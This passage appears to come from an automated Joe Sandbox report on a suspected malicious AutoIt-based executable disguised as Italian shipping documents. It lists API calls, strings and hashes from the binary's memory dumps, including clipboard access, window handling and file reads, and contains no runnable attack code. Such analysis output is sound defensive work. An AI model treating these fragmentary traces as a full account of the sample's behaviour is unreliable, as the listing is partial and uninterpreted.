                        • CopyRect.USER32(?,?), ref: 004568BE
                        • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                        • String ID: ($,$tooltips_class32
                        • API String ID: 225202481-3320066284
                        APIs
                        • OpenClipboard.USER32(?), ref: 0046DCE7
                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                        • CloseClipboard.USER32 ref: 0046DD0D
                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                        • CloseClipboard.USER32 ref: 0046DD41
                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                        • CloseClipboard.USER32 ref: 0046DD99
                        Similarity
                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                        • String ID:
                        • API String ID: 15083398-0
                        APIs
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • GetWindowRect.USER32(?,?), ref: 00471CF7
                        • GetClientRect.USER32(?,?), ref: 00471D05
                        • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                        • GetSystemMetrics.USER32(00000008), ref: 00471D20
                        • GetSystemMetrics.USER32(00000004), ref: 00471D42
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                        • GetSystemMetrics.USER32(00000007), ref: 00471D79
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                        • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                        • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                        • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                        • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                        • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                        • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                        • GetClientRect.USER32(?,?), ref: 00471E8A
                        • GetStockObject.GDI32(00000011), ref: 00471EA6
                        • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                        • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                        Similarity
                        • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                        • String ID: @$AutoIt v3 GUI
                        • API String ID: 867697134-3359773793
                        Similarity
                        • API ID: __wcsicoll$__wcsnicmp
                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                        • API String ID: 790654849-32604322
                        APIs
                          • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                        • _fseek.LIBCMT ref: 00452B3B
                        • __wsplitpath.LIBCMT ref: 00452B9B
                        • _wcscpy.LIBCMT ref: 00452BB0
                        • _wcscat.LIBCMT ref: 00452BC5
                        • __wsplitpath.LIBCMT ref: 00452BEF
                        • _wcscat.LIBCMT ref: 00452C07
                        • _wcscat.LIBCMT ref: 00452C1C
                        • __fread_nolock.LIBCMT ref: 00452C53
                        • __fread_nolock.LIBCMT ref: 00452C64
                        • __fread_nolock.LIBCMT ref: 00452C83
                        • __fread_nolock.LIBCMT ref: 00452C94
                        • __fread_nolock.LIBCMT ref: 00452CB5
                        • __fread_nolock.LIBCMT ref: 00452CC6
                        • __fread_nolock.LIBCMT ref: 00452CD7
                        • __fread_nolock.LIBCMT ref: 00452CE8
                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                        • __fread_nolock.LIBCMT ref: 00452D78
                        Similarity
                        • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                        • String ID:
                        • API String ID: 2054058615-0
                        APIs
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                        Similarity
                        • API ID: Window
                        • String ID: 0
                        • API String ID: 2353593579-4108050209
                        APIs
                        • GetSysColor.USER32(0000000F), ref: 0044A05E
                        • GetClientRect.USER32(?,?), ref: 0044A0D1
                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                        • GetWindowDC.USER32(?), ref: 0044A0F6
                        • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                        • ReleaseDC.USER32(?,?), ref: 0044A11B
                        • GetSysColor.USER32(0000000F), ref: 0044A131
                        • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                        • GetSysColor.USER32(0000000F), ref: 0044A14F
                        • GetSysColor.USER32(00000005), ref: 0044A15B
                        • GetWindowDC.USER32(?), ref: 0044A1BE
                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                        • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                        • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                        • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                        • ReleaseDC.USER32(?,00000000), ref: 0044A229
                        • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                        • GetSysColor.USER32(00000008), ref: 0044A265
                        • SetTextColor.GDI32(?,00000000), ref: 0044A270
                        • SetBkMode.GDI32(?,00000001), ref: 0044A282
                        • GetStockObject.GDI32(00000005), ref: 0044A28A
                        Similarity
                        • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                        • String ID:
                        • API String ID: 1744303182-0
                        APIs
                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                        • __mtterm.LIBCMT ref: 00417C34
                          • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                          • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                        • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                        • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                        • __init_pointers.LIBCMT ref: 00417CE6
                        • __calloc_crt.LIBCMT ref: 00417D54
                        • GetCurrentThreadId.KERNEL32 ref: 00417D80
                        Similarity
                        • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                        • API String ID: 4163708885-3819984048
                        Similarity
                        • API ID: __wcsicoll$IconLoad
                        • String ID: blank$info$question$stop$warning
                        • API String ID: 2485277191-404129466
                        APIs
                        • LoadIconW.USER32(?,00000063), ref: 0045464C
                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                        • SetWindowTextW.USER32(?,?), ref: 00454678
                        • GetDlgItem.USER32(?,000003EA), ref: 00454690
                        • SetWindowTextW.USER32(00000000,?), ref: 00454697
                        • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                        • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                        • GetWindowRect.USER32(?,?), ref: 004546F5
                        • SetWindowTextW.USER32(?,?), ref: 00454765
                        • GetDesktopWindow.USER32 ref: 0045476F
                        • GetWindowRect.USER32(00000000), ref: 00454776
                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                        • GetClientRect.USER32(?,?), ref: 004547D2
                        • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                        • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                        Similarity
                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                        • String ID:
                        • API String ID: 3869813825-0
                        APIs
                        • _wcslen.LIBCMT ref: 00464B28
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                        • _wcslen.LIBCMT ref: 00464C28
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                        • _wcslen.LIBCMT ref: 00464CBA
                        • _wcslen.LIBCMT ref: 00464CD0
                        • _wcslen.LIBCMT ref: 00464CEF
                        Similarity
                        • API ID: _wcslen$Directory$CurrentSystem
                        • String ID: D
                        • API String ID: 1914653954-2746444292
                        APIs
                        • _wcsncpy.LIBCMT ref: 0045CE39
                        • __wsplitpath.LIBCMT ref: 0045CE78
                        • _wcscat.LIBCMT ref: 0045CE8B
                        • _wcscat.LIBCMT ref: 0045CE9E
                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                        • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                        • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                        • _wcscpy.LIBCMT ref: 0045CF61
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                        Strings
                        Similarity
                        • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                        • String ID: *.*
                        • API String ID: 1153243558-438819550
                        • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                        • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                        • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                        • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                        APIs
                        Strings
                        Similarity
                        • API ID: __wcsicoll
                        • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                        • API String ID: 3832890014-4202584635
                        • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                        • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                        • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                        • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                        APIs
                        • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                        • GetFocus.USER32 ref: 0046A0DD
                        • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                        Strings
                        Similarity
                        • API ID: MessagePost$CtrlFocus
                        • String ID: 0
                        • API String ID: 1534620443-4108050209
                        • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                        • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                        • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                        • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                        APIs
                        • DestroyWindow.USER32(?), ref: 004558E3
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                        Strings
                        Similarity
                        • API ID: Window$CreateDestroy
                        • String ID: ,$tooltips_class32
                        • API String ID: 1109047481-3856767331
                        • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                        • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                        • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                        • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                        APIs
                        • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                        • GetMenuItemCount.USER32(?), ref: 00468C45
                        • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                        • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                        • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                        • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                        • GetMenuItemCount.USER32 ref: 00468CFD
                        • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                        • GetCursorPos.USER32(?), ref: 00468D3F
                        • SetForegroundWindow.USER32(?), ref: 00468D49
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                        • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                        Strings
                        Similarity
                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                        • String ID: 0
                        • API String ID: 1441871840-4108050209
                        • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                        • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                        • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                        • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                        • __swprintf.LIBCMT ref: 00460915
                        • __swprintf.LIBCMT ref: 0046092D
                        • _wprintf.LIBCMT ref: 004609E1
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                        Strings
                        Similarity
                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                        • API String ID: 3631882475-2268648507
                        • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                        • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                        • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                        • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                        APIs
                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                        • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                        • SendMessageW.USER32 ref: 00471740
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                        • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                        • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                        • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                        • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                        • SendMessageW.USER32 ref: 0047184F
                        • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                        • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                        Similarity
                        • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                        • String ID:
                        • API String ID: 4116747274-0
                        • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                        • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                        • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                        • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                        APIs
                        • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                        • _wcslen.LIBCMT ref: 00461683
                        • __swprintf.LIBCMT ref: 00461721
                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                        • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                        • GetDlgCtrlID.USER32(?), ref: 00461869
                        • GetWindowRect.USER32(?,?), ref: 004618A4
                        • GetParent.USER32(?), ref: 004618C3
                        • ScreenToClient.USER32(00000000), ref: 004618CA
                        • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                        • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                        Strings
                        Similarity
                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                        • String ID: %s%u
                        • API String ID: 1899580136-679674701
                        • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                        • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                        • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                        • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                        APIs
                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                        • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                        • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                        Strings
                        Similarity
                        • API ID: InfoItemMenu$Sleep
                        • String ID: 0
                        • API String ID: 1196289194-4108050209
                        • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                        • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                        • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                        • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                        APIs
                        • GetDC.USER32(00000000), ref: 0043143E
                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                        • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                        • SelectObject.GDI32(00000000,?), ref: 00431466
                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                        • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                        Strings
                        Similarity
                        • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                        • String ID: (
                        • API String ID: 3300687185-3887548279
                        • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                        • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                        • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                        • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                        APIs
                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                        • GetDriveTypeW.KERNEL32 ref: 0045DB32
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                        Strings
                        Similarity
                        • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                        • API String ID: 1976180769-4113822522
                        • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                        • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                        • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                        • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                        APIs
                        Similarity
                        • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                        • String ID:
                        • API String ID: 461458858-0
                        • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                        • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                        • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                        • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                        APIs
                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                        • GlobalLock.KERNEL32(00000000), ref: 004300F6
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                        • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                        • CloseHandle.KERNEL32(00000000), ref: 00430113
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                        • GlobalFree.KERNEL32(00000000), ref: 00430150
                        • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                        • DeleteObject.GDI32(?), ref: 004301D0
                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                        Similarity
                        • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                        • String ID:
                        • API String ID: 3969911579-0
                        • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                        • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                        • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                        • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                        APIs
                        Strings
                        Similarity
                        • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                        • String ID: 0
                        • API String ID: 956284711-4108050209
                        • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                        • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                        • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                        • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                        APIs
                        Strings
                        Similarity
                        • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                        • String ID: 0.0.0.0
                        • API String ID: 1965227024-3771769585
                        • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                        • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                        • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                        • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                        APIs
                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                        Strings
                        Similarity
                        • API ID: SendString$_memmove_wcslen
                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                        • API String ID: 369157077-1007645807
                        • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                        • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                        • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                        • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                        APIs
                        • GetParent.USER32 ref: 00445BF8
                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                        • __wcsicoll.LIBCMT ref: 00445C33
                        • __wcsicoll.LIBCMT ref: 00445C4F
                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                        Strings
